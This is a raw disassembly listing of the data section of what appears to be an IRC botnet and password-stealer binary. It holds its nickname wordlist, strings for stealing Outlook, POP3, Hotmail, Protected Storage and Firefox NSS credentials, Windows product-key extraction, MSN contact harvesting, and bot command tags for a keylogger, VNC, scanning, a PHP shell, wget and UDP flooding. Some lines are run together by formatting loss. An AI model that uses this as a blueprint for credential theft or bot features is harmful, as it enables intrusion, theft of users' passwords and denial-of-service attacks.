dd offset aMuha ; "muha"
dd offset aMof0z ; "mof0z"
dd offset aMofoz ; "mofoz"
dd offset aTotz ; "totz"
dd offset aLol0lzz ; "lol0lzz"
dd offset aLololz ; "lololz"
dd offset dword_44F840
dd offset dword_44F838
dd offset dword_44F830
dd offset dword_44F828
dd offset dword_44F824
dd offset dword_44F820
dd offset dword_44F81C
dword_44F81C dd 7536h dword_44F820 dd 7538h dword_44F824 dd 347Ch dword_44F828 dd 756F7934h, 7Dhdword_44F830 dd 7C737534h, 0 dword_44F838 dd 65657266h, 7Chdword_44F840 dd 7C617Ch aLololz db 'lololz',0 ; DATA XREF: .text:0044F7FC�o
align 4
aLol0lzz db 'lol0lzz',0 ; DATA XREF: .text:0044F7F8�o
aTotz db 'totz',0 ; DATA XREF: .text:0044F7F4�o
align 4
aMofoz db 'mofoz',0 ; DATA XREF: .text:0044F7F0�o
align 4
aMof0z db 'mof0z',0 ; DATA XREF: .text:0044F7EC�o
align 4
aMuha db 'muha',0 ; DATA XREF: .text:0044F7E8�o
align 4
aYeah db 'yeah',0 ; DATA XREF: .text:0044F7E4�o
align 4
off_44F87C dd offset byte_616861 ; DATA XREF: .text:0044F7E0�o
aShit db 'shit',0 ; DATA XREF: .text:0044F7DC�o
align 4
aGurl db 'gurl',0 ; DATA XREF: .text:0044F7D8�o
align 10h
aGirl db 'GIRL',0 ; DATA XREF: .text:0044F7D4�o
align 4
off_44F898 dd offset word_594F42 ; DATA XREF: .text:0044F7D0�o
aFree db 'Free',0 ; DATA XREF: .text:0044F7BC�o
align 4
aFook db '|Fook|',0 ; DATA XREF: .text:0044F7B8�o
align 4
aSl33pin db 'Sl33piN',0 ; DATA XREF: .text:0044F7AC�o
aAa db '^AA^',0 ; DATA XREF: .text:0044F7A0�o
align 4
off_44F8BC dd offset byte_646153 ; DATA XREF: .text:0044F79C�o
aLuvu db 'LUVU',0 ; DATA XREF: .text:0044F798�o
align 4
off_44F8C8 dd offset byte_5F7C5F ; DATA XREF: .text:0044F78C�o
aJunk db 'junk',0 ; DATA XREF: .text:0044F788�o
align 4
aW00i3s db 'w00i3s-',0 ; DATA XREF: .text:0044F784�o
aBbl db '|bbl',0 ; DATA XREF: .text:0044F780�o
align 4
off_44F8E4 dd offset loc_425240+2 ; DATA XREF: .text:0044F77C�o
dword_44F8E8 dd 6B66617Ch, 0 dword_44F8F0 dd 6177617Ch, 79haAway db 'away',0 ; DATA XREF: .text:0044F770�o
align 10h
aAfk db 'afk',0 ; DATA XREF: .text:0044F76C�o
off_44F904 dd offset byte_63636D ; DATA XREF: .text:0044F758�o
aTrick db 'trick',0 ; DATA XREF: .text:0044F754�o
align 10h
aTry db 'try',0 ; DATA XREF: .text:0044F750�o
aLuvy db 'luvy',0 ; DATA XREF: .text:0044F74C�o
align 4
aUi db 'ui',0 ; DATA XREF: .text:0044F748�o
align 10h
aDf db 'df',0 ; DATA XREF: .text:0044F744�o
align 4
aRt db 'rt',0 ; DATA XREF: .text:0044F740�o
align 4
aGf db 'gf',0 ; DATA XREF: .text:0044F73C�o
align 4
aTy db 'ty',0 ; DATA XREF: .text:0044F738�o
align 10h
aRg db 'rg',0 ; DATA XREF: .text:0044F734�o
align 4
aHay db 'hay',0 ; DATA XREF: .text:0044F730�o
aRs db 'rs',0 ; DATA XREF: .text:0044F710�o
align 4
aO_2: ; DATA XREF: .text:0044F704�o
unicode 0, <o>,0
a__2: ; DATA XREF: .text:0044F6EC�o
unicode 0, <_>,0
aDd8A db '|dd8|a',0 ; DATA XREF: .text:0044F6C8�o
align 4
aQ809 db 'Q809',0 ; DATA XREF: .text:0044F6C4�o
align 4
aSi db 'si}}',0 ; DATA XREF: .text:0044F6C0�o
align 4
aWikd db '|wikd',0 ; DATA XREF: .text:0044F6BC�o
align 4
aLuf db '|luf|',0 ; DATA XREF: .text:0044F6B8�o
align 4
aGens db '{gens|',0 ; DATA XREF: .text:0044F6B4�o
align 4
aSex db '{sex}',0 ; DATA XREF: .text:0044F6B0�o
align 4
aHub db '{hub}',0 ; DATA XREF: .text:0044F6AC�o
align 4
aLuck db '|luck|',0 ; DATA XREF: .text:0044F6A8�o
align 4
aSuck db '|suck|',0 ; DATA XREF: .text:0044F6A4�o
align 4
aTot db '-|tot|',0 ; DATA XREF: .text:0044F6A0�o
align 4
aWoh db '|woh|',0 ; DATA XREF: .text:0044F69C�o
align 4
aTambe db '|tambe|',0 ; DATA XREF: .text:0044F698�o
off_44F9AC dd offset dword_67616C ; DATA XREF: .text:0044F694�o
off_44F9B0 dd offset word_646162 ; DATA XREF: .text:0044F690�o
aTree db 'tree',0 ; DATA XREF: .text:0044F68C�o
align 4
aZex db 'zex',0 ; DATA XREF: .text:0044F688�o
aLez db 'lez',0 ; DATA XREF: .text:0044F684�o
aSh3x db 'sh3x',0 ; DATA XREF: .text:off_44F680�o
align 4
aMan db 'man',0 ; DATA XREF: .text:0044F678�o
aMoon db 'moon',0 ; DATA XREF: .text:0044F674�o
align 4
aChild db 'child',0 ; DATA XREF: .text:0044F670�o
align 10h
aFat db 'fat',0 ; DATA XREF: .text:0044F66C�o
aPizza db 'pizza',0 ; DATA XREF: .text:0044F668�o
align 4
aBaby db 'baby',0 ; DATA XREF: .text:0044F664�o
align 4
aW4nt3d db 'W4NT3D',0 ; DATA XREF: .text:0044F660�o
align 4
aBiatch db 'biatch',0 ; DATA XREF: .text:0044F65C�o
align 4
aCumhur db 'cumhur',0 ; DATA XREF: .text:0044F658�o
align 4
aAdammo db 'ADAMMO',0 ; DATA XREF: .text:0044F654�o
align 4
aMaverick db 'MavericK',0 ; DATA XREF: .text:0044F650�o
align 10h
aProm3theus db 'prom3theus',0 ; DATA XREF: .text:0044F64C�o
align 4
aDallas db 'DALLAS',0 ; DATA XREF: .text:0044F648�o
align 4
aTeoman db 'TEOMAN``',0 ; DATA XREF: .text:0044F644�o
align 10h
aRerpjj db 'RERPJJ',0 ; DATA XREF: .text:0044F640�o
align 4
aC3m39 db 'c3m39',0 ; DATA XREF: .text:0044F63C�o
align 10h
aC00l30m db 'c00l30m',0 ; DATA XREF: .text:0044F638�o
aTr0pikal db 'tr0pikal',0 ; DATA XREF: .text:0044F634�o
align 4
aPassenger db 'passenger',0 ; DATA XREF: .text:0044F630�o
align 10h
aNe__ db 'NE__',0 ; DATA XREF: .text:0044F62C�o
align 4
aUlaru db 'ularu',0 ; DATA XREF: .text:0044F628�o
align 10h
aLizmirlm db 'Lizmirlm',0 ; DATA XREF: .text:0044F624�o
align 4
aAkd3nnan db 'akd3nnan',0 ; DATA XREF: .text:0044F620�o
align 4
aK00oray db 'K00ORAY',0 ; DATA XREF: .text:0044F61C�o
aAta29111 db 'Ata29111',0 ; DATA XREF: .text:0044F618�o
align 4
aFirt db 'firt',0 ; DATA XREF: .text:0044F614�o
align 4
aAd33 db 'Ad33',0 ; DATA XREF: .text:0044F610�o
align 4
aM41st db 'M41ST',0 ; DATA XREF: .text:0044F60C�o
align 4
aMaxs1lla db 'maxs1lla',0 ; DATA XREF: .text:0044F608�o
align 10h
aAd3m28 db 'Ad3m28',0 ; DATA XREF: .text:0044F604�o
align 4
aAnkm4a db 'ankM4a',0 ; DATA XREF: .text:0044F600�o
align 10h
aErk3nnn db 'erk3nnn',0 ; DATA XREF: .text:0044F5FC�o
aD3vre db 'd3vre',0 ; DATA XREF: .text:0044F5F8�o
align 10h
aYab4nc db 'yab4nc',0 ; DATA XREF: .text:0044F5F4�o
align 4
aB1rs3n db 'b1rs3n',0 ; DATA XREF: .text:0044F5F0�o
align 10h
aA44mmm db 'a44mmm',0 ; DATA XREF: .text:0044F5EC�o
align 4
aAlcatrazak db 'alcatraZAK',0 ; DATA XREF: .text:0044F5E8�o
align 4
aErkaaaa db 'ERKAAAA',0 ; DATA XREF: .text:0044F5E4�o
aSevdan db 'sevdan',0 ; DATA XREF: .text:0044F5E0�o
align 4
aKot4n db 'kot4n',0 ; DATA XREF: .text:0044F5DC�o
align 4
aT3gm3n db 'T3GM3N',0 ; DATA XREF: .text:0044F5D8�o
align 4
aAchill3s db 'Achill3s',0 ; DATA XREF: .text:0044F5D4�o
align 10h
aK4pk db 'k4pk',0 ; DATA XREF: .text:0044F5D0�o
align 4
aAng3lg4l db 'ang3lg4l',0 ; DATA XREF: .text:0044F5CC�o
align 4
aH4yr4n db 'h4yr4n',0 ; DATA XREF: .text:0044F5C8�o
align 4
aF3n3r db 'F3N3R',0 ; DATA XREF: .text:0044F5C4�o
align 4
aAnkart db 'Ankart',0 ; DATA XREF: .text:0044F5C0�o
align 4
aDjmace db 'DJMACE',0 ; DATA XREF: .text:0044F5BC�o
align 4
aAnk32 db 'ANK32',0 ; DATA XREF: .text:0044F5B8�o
align 4
aUmut00 db 'umut00',0 ; DATA XREF: .text:0044F5B4�o
align 4
aAd4lim db 'AD4LIM',0 ; DATA XREF: .text:0044F5B0�o
align 4
aKumul db 'kumul',0 ; DATA XREF: .text:0044F5AC�o
align 4
aUzgun36 db 'uzgun36',0 ; DATA XREF: .text:0044F5A8�o
aSugaboi db 'SUGABOi',0 ; DATA XREF: .text:0044F5A4�o
aS3vis db 'S3ViS',0 ; DATA XREF: .text:0044F5A0�o
align 4
aKashmira db 'Kashmira',0 ; DATA XREF: .text:0044F59C�o
align 4
aAkut1 db 'akut1',0 ; DATA XREF: .text:0044F598�o
align 10h
aEllesme db 'Ellesme',0 ; DATA XREF: .text:0044F594�o
aMahinure db 'MAHINURE',0 ; DATA XREF: .text:0044F590�o
align 4
aH0ly1 db 'h0ly1',0 ; DATA XREF: .text:0044F58C�o
align 4
aFl0rd db 'FL0RD',0 ; DATA XREF: .text:0044F588�o
align 4
aKeb1kec db 'keb1kec',0 ; DATA XREF: .text:0044F584�o
aEsm3rkiz db 'Esm3rkiz',0 ; DATA XREF: .text:0044F580�o
align 4
aElm4zyok db 'elm4zyok',0 ; DATA XREF: .text:0044F57C�o
align 4
aEmr3e db 'Emr3e',0 ; DATA XREF: .text:0044F578�o
align 4
aAmth4n db 'AMTH4N',0 ; DATA XREF: .text:0044F574�o
align 4
aIrz4l db 'IRZ4L',0 ; DATA XREF: .text:0044F570�o
align 4
aHak4n3 db 'hak4n3',0 ; DATA XREF: .text:0044F56C�o
align 4
aMuratm_ db 'muratm_',0 ; DATA XREF: .text:0044F568�o
aKeyifli db 'keyifli',0 ; DATA XREF: .text:0044F564�o
aArd4k db 'ard4k',0 ; DATA XREF: .text:0044F560�o
align 4
aDevran db 'DeVran',0 ; DATA XREF: .text:0044F55C�o
align 4
aDzlim db 'DzliM',0 ; DATA XREF: .text:0044F558�o
align 4
aCongu db 'CoNGU',0 ; DATA XREF: .text:0044F554�o
align 4
aAlpay3m db 'alpay3m',0 ; DATA XREF: .text:0044F550�o
aBog4c3r db 'bog4c3r',0 ; DATA XREF: .text:0044F54C�o
aDonju4nm db 'Donju4nm',0 ; DATA XREF: .text:0044F548�o
align 10h
aAnkh4h db 'ankh4h',0 ; DATA XREF: .text:0044F544�o
align 4
aAte3e db 'AtE3e',0 ; DATA XREF: .text:0044F540�o
align 10h
aAyla db 'AYLA-',0 ; DATA XREF: .text:0044F53C�o
align 4
aAlb1na db 'alb1na',0 ; DATA XREF: .text:0044F538�o
align 10h
aIzm1rm db 'Izm1rm',0 ; DATA XREF: .text:0044F534�o
align 4
aAck0111 db 'ACK0111',0 ; DATA XREF: .text:0044F530�o
aAnk32m db 'ank32m',0 ; DATA XREF: .text:0044F52C�o
align 4
aTurkyballs db 'turkyballs',0 ; DATA XREF: .text:0044F528�o
align 4
aAhm3t db 'ahm3t',0 ; DATA XREF: .text:0044F524�o
align 4
aPelinci db 'pelinci',0 ; DATA XREF: .text:0044F520�o
aBlackp34rl db 'blackp34rl',0 ; DATA XREF: .text:0044F51C�o
align 10h
aRetg db 'RETG-',0 ; DATA XREF: .text:0044F518�o
align 4
aSamy3li db 'samy3li',0 ; DATA XREF: .text:0044F514�o
aPiram1t db 'PIRAM1T',0 ; DATA XREF: .text:0044F510�o
aAslii db 'aslii',0 ; DATA XREF: .text:0044F50C�o
align 10h
aErnesto db 'ERNESTO',0 ; DATA XREF: .text:0044F508�o
aHaticem db 'haticem',0 ; DATA XREF: .text:0044F504�o
aArzu db 'ARZU',0 ; DATA XREF: .text:0044F500�o
align 4
aAhm3txtc db 'Ahm3tXTC',0 ; DATA XREF: .text:0044F4FC�o
align 4
aDczz db 'dczz',0 ; DATA XREF: .text:0044F4F8�o
align 4
aXtczzz db 'xTczzz',0 ; DATA XREF: .text:0044F4F4�o
align 4
aXc4l db 'XC4L',0 ; DATA XREF: .text:0044F4F0�o
align 4
aBlondu db 'Blondu-',0 ; DATA XREF: .text:0044F4EC�o
aRot0r db 'rot0r',0 ; DATA XREF: .text:0044F4E8�o
align 4
aAkw1dz db 'AKW1Dz',0 ; DATA XREF: .text:0044F4E4�o
align 4
aBl0ndu db 'Bl0ndu',0 ; DATA XREF: .text:0044F4E0�o
align 4
a_d db '_d',0 ; DATA XREF: .text:0044F4DC�o
align 10h
aD_ db 'd_',0 ; DATA XREF: .text:0044F4D8�o
align 4
aDog db 'dog-',0 ; DATA XREF: .text:0044F4D4�o
align 4
aNils db 'Nils-',0 ; DATA XREF: .text:0044F4D0�o
align 4
aRyann db 'ryann',0 ; DATA XREF: .text:0044F4CC�o
align 4
aSmok3yS db 'smok3y-s',0 ; DATA XREF: .text:0044F4C4�o
align 4
aSmokeySn db 'smokey-sn',0 ; DATA XREF: .text:0044F4C0�o
align 4
aR0t0 db 'r0t0',0 ; DATA XREF: .text:0044F4BC�o
align 4
aR0t0r db 'r0t0r-',0 ; DATA XREF: .text:0044F4B8�o
; .text:0044F4C8�o
align 4
aSud3nur db 'SUD3NUR',0 ; DATA XREF: .text:0044F4B4�o
aSevmekmi db 'sevmekmi',0 ; DATA XREF: .text:0044F4B0�o
align 4
aVenedik34 db 'venedik34',0 ; DATA XREF: .text:0044F4AC�o
align 4
aTekir db 'tekir',0 ; DATA XREF: .text:0044F4A8�o
align 4
aMERV db 'M-E-R-V',0 ; DATA XREF: .text:0044F4A4�o
aTrr3nd db 'trr3nd',0 ; DATA XREF: .text:0044F4A0�o
align 4
aMel3kk db 'mel3kk',0 ; DATA XREF: .text:0044F49C�o
align 4
aAk1n db 'AK1N',0 ; DATA XREF: .text:0044F498�o
align 4
aM4ry db 'M4RY-',0 ; DATA XREF: .text:0044F494�o
align 4
aJer1cho db 'JER1CHO',0 ; DATA XREF: .text:0044F490�o
aTolga38 db 'Tolga38',0 ; DATA XREF: .text:0044F48C�o
aMizsund4y db 'mizsund4y',0 ; DATA XREF: .text:0044F488�o
align 10h
aIrm4ll db 'irm4Ll',0 ; DATA XREF: .text:0044F484�o
align 4
aBenibi db 'BeNiBi',0 ; DATA XREF: .text:0044F480�o
align 10h
aBerkkkko db 'berkkkko',0 ; DATA XREF: .text:0044F47C�o
align 4
aHexa4a db 'hexa4a',0 ; DATA XREF: .text:0044F478�o
align 4
aErk4nerkali db 'erk4nerkali',0 ; DATA XREF: .text:0044F474�o
aKandent db 'kandent',0 ; DATA XREF: .text:0044F470�o
aC4nsuu db 'c4nsuu',0 ; DATA XREF: .text:0044F46C�o
align 10h
aR45h3r db 'R45H3R',0 ; DATA XREF: .text:0044F468�o
align 4
aK3ncing db 'K3ncing',0 ; DATA XREF: .text:0044F464�o
aReshma db 'reshma',0 ; DATA XREF: .text:0044F460�o
align 4
aCam3l db 'CAM3L-',0 ; DATA XREF: .text:0044F45C�o
align 10h
aGirlzx db 'GirLzx',0 ; DATA XREF: .text:0044F458�o
align 4
aIiimra db 'iiimra',0 ; DATA XREF: .text:0044F454�o
align 10h
aC0redumpdd db 'C0reDumpDd',0 ; DATA XREF: .text:0044F450�o
align 4
aPur3g0ld db 'pur3g0ld',0 ; DATA XREF: .text:0044F44C�o
align 4
aK3rm1t db 'k3rm1t',0 ; DATA XREF: .text:0044F448�o
align 10h
aM4n4e db 'm4n4e',0 ; DATA XREF: .text:0044F444�o
align 4
aTr0ll3r db 'tr0ll3r',0 ; DATA XREF: .text:0044F440�o
aLisau db 'Lisau',0 ; DATA XREF: .text:0044F43C�o
align 4
aNastsha db 'nastsha',0 ; DATA XREF: .text:0044F438�o
aH4xdd db 'h4xdd-',0 ; DATA XREF: .text:0044F434�o
align 4
aR1mpy db 'r1mpy',0 ; DATA XREF: .text:0044F430�o
align 10h
aJann0 db 'jann0',0 ; DATA XREF: .text:0044F42C�o
align 4
aBunty007 db 'bunty007',0 ; DATA XREF: .text:0044F428�o
align 4
aHev4l db 'hev4l',0 ; DATA XREF: .text:0044F424�o
align 4
aCmecme db 'cmecme',0 ; DATA XREF: .text:0044F420�o
align 4
aSe1nf3ld db 'se1nf3ld',0 ; DATA XREF: .text:0044F41C�o
align 10h
aSeiny db 'seiny',0 ; DATA XREF: .text:0044F418�o
align 4
aM4rcy db 'm4rcy',0 ; DATA XREF: .text:0044F414�o
align 10h
aTalika db 'Talika',0 ; DATA XREF: .text:0044F410�o
align 4
aShezzza db 'Shezzza',0 ; DATA XREF: .text:0044F40C�o
aPwntuuuu db 'pwntuuuu',0 ; DATA XREF: .text:0044F408�o
align 4
aXtcXcal db 'xTc-xCaL',0 ; DATA XREF: .text:0044F404�o
align 4
aXc4libr3 db 'xc4libr3',0 ; DATA XREF: .text:0044F400�o
align 4
aK3nnn db 'k3nnn',0 ; DATA XREF: .text:0044F3FC�o
align 4
aFl3xxxt3r db 'fl3xxxt3r',0 ; DATA XREF: .text:0044F3F8�o
align 4
aKok00 db 'kok00',0 ; DATA XREF: .text:0044F3F4�o
align 10h
aM4le db 'm4le',0 ; DATA XREF: .text:0044F3F0�o
align 4
aSw1n db 'sw1n',0 ; DATA XREF: .text:0044F3EC�o
align 10h
aC4r1nna db 'C4r1nna',0 ; DATA XREF: .text:0044F3E8�o
aKr1zha db 'KR1ZHA',0 ; DATA XREF: .text:0044F3E4�o
align 10h
aEmilyia db 'Emilyia',0 ; DATA XREF: .text:0044F3E0�o
aEmilya db 'emilya',0 ; DATA XREF: .text:0044F3DC�o
align 10h
aB0bm4rl3y db 'B0BM4RL3Y',0 ; DATA XREF: .text:0044F3D8�o
align 4
aMax1xguy db 'max1xguy',0 ; DATA XREF: .text:0044F3D4�o
align 4
aFar0oq db 'far0oq',0 ; DATA XREF: .text:0044F3D0�o
align 10h
aSm4rt3 db 'SM4RT3',0 ; DATA XREF: .text:0044F3CC�o
align 4
aN_3: ; DATA XREF: .text:0044F3C4�o
unicode 0, <N>,0
aB_1: ; DATA XREF: .text:0044F3C0�o
unicode 0, <B>,0
aV_2: ; DATA XREF: .text:0044F3BC�o
unicode 0, <V>,0
aC_4: ; DATA XREF: .text:0044F3B8�o
unicode 0, <C>,0
aZ_4: ; DATA XREF: .text:0044F3B0�o
unicode 0, <Z>,0
asc_44FFBC: ; DATA XREF: .text:0044F3AC�o
unicode 0, <L>,0
aK_3: ; DATA XREF: .text:0044F3A8�o
unicode 0, <K>,0
aJ_2: ; DATA XREF: .text:0044F3A4�o
unicode 0, <J>,0
asc_44FFC8: ; DATA XREF: .text:0044F3A0�o
unicode 0, <H>,0
aG_2: ; DATA XREF: .text:0044F39C�o
unicode 0, <G>,0
aF_2: ; DATA XREF: .text:0044F398�o
; .text:0044F790�o
unicode 0, <F>,0
aD_3: ; DATA XREF: .text:0044F394�o
unicode 0, <D>,0
aS_10: ; DATA XREF: .text:0044F390�o
unicode 0, <S>,0
aA_0: ; DATA XREF: .text:0044F38C�o
unicode 0, <A>,0
aO_3: ; DATA XREF: .text:0044F384�o
unicode 0, <O>,0
aI_4: ; DATA XREF: .text:0044F380�o
unicode 0, <I>,0
aU_3: ; DATA XREF: .text:0044F37C�o
unicode 0, <U>,0
aY_3: ; DATA XREF: .text:0044F378�o
unicode 0, <Y>,0
aT_3: ; DATA XREF: .text:0044F374�o
unicode 0, <T>,0
aR_2: ; DATA XREF: .text:0044F370�o
unicode 0, <R>,0
aE_4: ; DATA XREF: .text:0044F36C�o
unicode 0, <E>,0
aW_2: ; DATA XREF: .text:0044F368�o
unicode 0, <W>,0
aQ_3: ; DATA XREF: .text:0044F364�o
unicode 0, <Q>,0
aM_7: ; DATA XREF: .text:0044F360�o
; .text:0044F6FC�o
unicode 0, <m>,0
aN_4: ; DATA XREF: .text:0044F35C�o
; .text:0044F700�o
unicode 0, <n>,0
aB_2: ; DATA XREF: .text:0044F358�o
; .text:0044F6CC�o ...
unicode 0, <b>,0
aV_3: ; DATA XREF: .text:0044F354�o
; .text:0044F71C�o
unicode 0, <v>,0
aZ_5: ; DATA XREF: .text:0044F348�o
; .text:0044F72C�o ...
unicode 0, <z>,0
asc_450018: ; DATA XREF: .text:0044F344�o
; .text:0044F6F8�o
unicode 0, <l>,0
aK_4: ; DATA XREF: .text:0044F340�o
; .text:0044F6F4�o
unicode 0, <k>,0
aJ_3: ; DATA XREF: .text:0044F33C�o
; .text:0044F6F0�o
unicode 0, <j>,0
asc_450024: ; DATA XREF: .text:0044F338�o
; .text:0044F6E4�o
unicode 0, <h>,0
aG_3: ; DATA XREF: .text:0044F334�o
; .text:0044F6E0�o ...
unicode 0, <g>,0
aF_3: ; DATA XREF: .text:0044F330�o
; .text:0044F6DC�o
unicode 0, <f>,0
aD_4: ; DATA XREF: .text:0044F32C�o
; .text:0044F6D4�o
unicode 0, <d>,0
aP_6: ; DATA XREF: .text:0044F320�o
; .text:0044F708�o
unicode 0, <p>,0
aI_5: ; DATA XREF: .text:0044F31C�o
; .text:0044F6E8�o
unicode 0, <i>,0
aU_4: ; DATA XREF: .text:0044F318�o
; .text:0044F718�o
unicode 0, <u>,0
aT_4: ; DATA XREF: .text:0044F310�o
; .text:0044F714�o
unicode 0, <t>,0
aW_3: ; DATA XREF: .text:0044F304�o
; .text:0044F720�o
unicode 0, <w>,0
aSPstore_dllNot db '%s PStore.dll not loaded',0 ; DATA XREF: sub_42377D+B1�o
; .text:off_44ED14�o ...
align 4
aPop3Pass2 db 'POP3 Pass2',0 ; DATA XREF: sub_423850+29C�o
align 10h
aPop3Server db 'POP3 Server',0 ; DATA XREF: sub_423850+250�o
aPop3UserName db 'POP3 User Name',0 ; DATA XREF: sub_423850+1FC�o
align 4
aHttpmailPass2 db 'HTTPMail Pass2',0 ; DATA XREF: sub_423850+15F�o
align 4
aHotmail db 'Hotmail',0 ; DATA XREF: sub_423850+144�o
aHttpmailUserna db 'HTTPMail UserName',0 ; DATA XREF: sub_423850+F3�o
align 4
aSoftwareMicr_1 db 'Software\Microsoft\Internet Account Manager\Accounts',0
; DATA XREF: sub_423850+2C�o
; sub_423850+96�o
align 10h
aSNoPstoreEntri db '%s No PStore entries found.',0 ; DATA XREF: sub_423BB1+909�o
dword_45010C dd 2207325h, 61724528h, 20646573h, 6C74754Fh, 206B6F6Fh
; DATA XREF: sub_423BB1+87E�o
dd 72707845h, 29737365h, 220023Ah, 702F6C28h, 20023A29h
dd 3A73255Bh, 5D7325h
dword_45013C dd 2207325h, 74754F28h, 6B6F6F6Ch, 70784520h, 73736572h
; DATA XREF: sub_423BB1+83A�o
dd 20023A29h, 2207325h, 702F6C28h, 20023A29h, 3A73255Bh
dd 5D7325h
a220d5cc1 db '220d5cc1',0 ; DATA XREF: sub_423BB1+788�o
align 4
dword_450174 dd 2207325h, 4E534D28h, 2F444920h, 73736150h, 20023A29h
; DATA XREF: sub_423BB1+750�o
dd 2F6C2802h, 23A2970h, 73255B20h, 5D73253Ah, 0
aB9819c52 db 'b9819c52',0 ; DATA XREF: sub_423BB1+5E9�o
align 4
dword_4501A8 dd 2207325h, 20454928h, 294C5255h, 2520023Ah, 28022073h
; DATA XREF: sub_423BB1+5C4�o
dd 29702F6Ch, 5B20023Ah, 253A7325h, 5D73h
dword_4501CC dd 70747468h, 2F3A73hdword_4501D4 dd 70747468h, 2F3Ahdword_4501DC dd 7274533Ah, 676E69h ; sub_423BB1+4D2�o
aStringindex db 'StringIndex',0 ; DATA XREF: sub_423BB1+4A0�o
aE161255a db 'e161255a',0 ; DATA XREF: sub_423BB1+486�o
align 4
dword_4501FC dd 2207325h, 20454928h, 204C5255h, 63617448h, 73736563h
; DATA XREF: sub_423BB1+461�o
dd 20023A29h, 2207325h, 702F6C28h, 20023A29h, 3A73255Bh
dd 5D7325h
a5e7e8100 db '5e7e8100',0 ; DATA XREF: sub_423BB1+3B1�o
align 4
aWs db '%ws',0 ; DATA XREF: sub_423BB1+2DD�o
asc_450238 db '%x',0 ; DATA XREF: sub_423BB1+1F1�o
align 4
dword_45023C dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh ; sub_423BB1+232�o ...
dword_45024C dd 6E207325h, 2520746Fh, 2E73haProtectedstora db 'ProtectedStorage',0 ; DATA XREF: sub_423BB1+13�o
align 4
aPl_base64decod db 'PL_Base64Decode',0 ; DATA XREF: sub_424699+1D4�o
aPk11_checkuser db 'PK11_CheckUserPassword',0 ; DATA XREF: sub_424699+189�o
align 4
aPk11sdr_decryp db 'PK11SDR_Decrypt',0 ; DATA XREF: sub_424699+177�o
aPk11_authentic db 'PK11_Authenticate',0 ; DATA XREF: sub_424699+165�o
align 4
aPk11_freeslot db 'PK11_FreeSlot',0 ; DATA XREF: sub_424699+153�o
align 4
aPk11_getintern db 'PK11_GetInternalKeySlot',0 ; DATA XREF: sub_424699+141�o
aNss_shutdown db 'NSS_Shutdown',0 ; DATA XREF: sub_424699+12F�o
align 10h
aNss_init db 'NSS_Init',0 ; DATA XREF: sub_424699+122�o
align 4
aSoftokn3_dll db 'softokn3.dll',0 ; DATA XREF: sub_424699+C9�o
align 4
aSqlite3_dll db 'sqlite3.dll',0 ; DATA XREF: sub_424699+7A�o
aNssutil3_dll db 'nssutil3.dll',0 ; DATA XREF: sub_424699+69�o
align 4
aPlds4_dll db 'plds4.dll',0 ; DATA XREF: sub_424699+4B�o
; sub_424699+94�o
align 4
aNspr4_dll db 'nspr4.dll',0 ; DATA XREF: sub_424699+34�o
align 10h
aMozcrt19_dll db 'mozcrt19.dll',0 ; DATA XREF: sub_424699+28�o
align 10h
aNss3_dll db 'nss3.dll',0 ; DATA XREF: sub_424699+1D�o
align 4
aPlc4_dll db 'plc4.dll',0 ; DATA XREF: sub_424699+18�o
align 4
asc_450368 db ': ',0 ; DATA XREF: sub_424A42+1AB�o
; sub_42BE29+28�o
align 4
dword_45036C dd 2207325h, 25464628h, 52552064h, 23A294Ch, 20732520h
; DATA XREF: sub_424A42+11E�o
dd 2F6C2802h, 23A2970h, 20h
dword_45038C dd 6E676973h, 33736E6Fh, 7478742Eh, 0 ; sub_424FC9+171�o
dword_45039C dd 6E676973h, 32736E6Fh, 7478742Eh, 0 ; sub_424FC9+14E�o
dword_4503AC dd 6E676973h, 2E736E6Fh, 747874h ; sub_424FC9+12B�o
aSoftwareClient db 'SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command'
; DATA XREF: sub_424C9C+F�o
db 0
align 4
aPath_0 db 'path=',0 ; DATA XREF: sub_424DE2:loc_424EED�o
align 4
aNameDefault db 'name=default',0 ; DATA XREF: sub_424DE2+F1�o
align 4
aProfiles_ini db '\profiles.ini',0 ; DATA XREF: sub_424DE2+AC�o
align 4
aApplicationDat db 'Application Data\Mozilla\Firefox',0 ; DATA XREF: sub_424DE2+2A�o
align 4
aCurrentversion db 'CurrentVersion',0 ; DATA XREF: sub_424FC9+80�o
align 4
aSoftwareMozi_0 db 'SOFTWARE\mozilla.org\Mozilla',0 ; DATA XREF: sub_424FC9+5F�o
align 4
aSoftwareMozill db 'SOFTWARE\Mozilla\Mozilla Firefox',0 ; DATA XREF: sub_424FC9+45�o
align 4
aAllowD db 'Allow%d',0 ; DATA XREF: sub_425156+1DE�o
dword_4504A4 dd 4E534D02h, 2520023Ah, 73haSoftwareMicr_3 db 'Software\Microsoft\MessengerService\ListCache\.NET Messenger Serv'
; DATA XREF: sub_425156+194�o
db 'ice',0
align 4
aSoftwareMicr_2 db 'Software\Microsoft\WAB\WAB4\Wab File Name',0 ; DATA XREF: sub_425156+41�o
align 4
byte_450524 db 42h ; DATA XREF: sub_4253C0+A3�r
aCdfghjkmpqrtvw db 'CDFGHJKMPQRTVWXY2346789',0
align 10h
aDigitalproduct db 'DigitalProductId',0 ; DATA XREF: sub_4253C0+43�o
align 4
aSoftwareMicr_4 db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion',0
; DATA XREF: sub_4253C0+15�o
align 4
aSWindowsKeyNot db '%s Windows Key not found.',0 ; DATA XREF: sub_42549F+16F�o
align 10h
aSWindowsSSKey_ db '%s Windows %s (%s) Key: %.29s',0 ; DATA XREF: sub_42549F+149�o
align 10h
a2008 db '2008',0 ; DATA XREF: sub_42549F:loc_4255A8�o
align 4
aVnc db '[VNC]:',0 ; DATA XREF: sub_4256BD+F7�o
align 10h
aKeylogger db '[KEYLOGGER]:',0 ; DATA XREF: sub_4256BD+E2�o
align 10h
aTftp_0 db '[TFTP]:',0 ; DATA XREF: sub_4256BD+CD�o
aFtp_0 db '[FTP]:',0 ; DATA XREF: sub_4256BD+B8�o
align 10h
aScan db '[SCAN]:',0 ; DATA XREF: sub_4256BD+A7�o
aMain_1 db '[MAIN]:',0 ; DATA XREF: sub_4256BD+96�o
aPhpshell db 'phpshell',0 ; DATA XREF: sub_4256BD+85�o
align 4
aWget db 'wget',0 ; DATA XREF: sub_4256BD+74�o
align 4
aPush db '!* PUSH',0 ; DATA XREF: sub_4256BD+63�o
aPan db '!* PAN',0 ; DATA XREF: sub_4256BD+52�o
align 4
aUdp db '!* UDP',0 ; DATA XREF: sub_4256BD:loc_4256FE�o
align 4
